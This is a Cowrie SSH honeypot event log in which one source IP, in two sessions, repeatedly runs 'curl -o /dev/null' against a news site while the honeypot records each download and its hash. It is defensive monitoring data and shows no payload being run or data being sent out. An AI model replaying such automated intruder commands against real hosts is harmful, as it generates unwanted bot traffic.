{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.371418Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.391459Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.402351Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.403685Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.409333Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.410599Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.415925Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.430952Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.432801Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.440512Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.441397Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.452546Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.453591Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.465606Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.475778Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.476930Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.480188Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.493005Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.494037Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.509962Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.515268Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.516538Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.532371Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.533551Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.539695Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.541019Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.556423Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.557701Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.574174Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.577639Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.578941Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.603534Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.605687Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.607742Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.609519Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.618731Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.639840Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.640872Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.643327Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.646180Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.647140Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.662827Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.675901Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.680407Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.682244Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.683341Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.685715Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.686613Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.700045Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.703076Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.723145Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.724314Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.728812Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.730184Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.753640Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.763814Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.765081Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.765962Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.770234Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.771415Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.783350Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.805812Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.807209Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.811533Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.812332Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.834863Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.843710Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.844786Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.849682Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.852325Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.853543Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.856276Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.874953Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.887375Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.888587Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.896953Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.898499Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.903795Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.920174Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.924705Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.926784Z","src_ip":"212.227.125.160","session":"7541ed730449"}
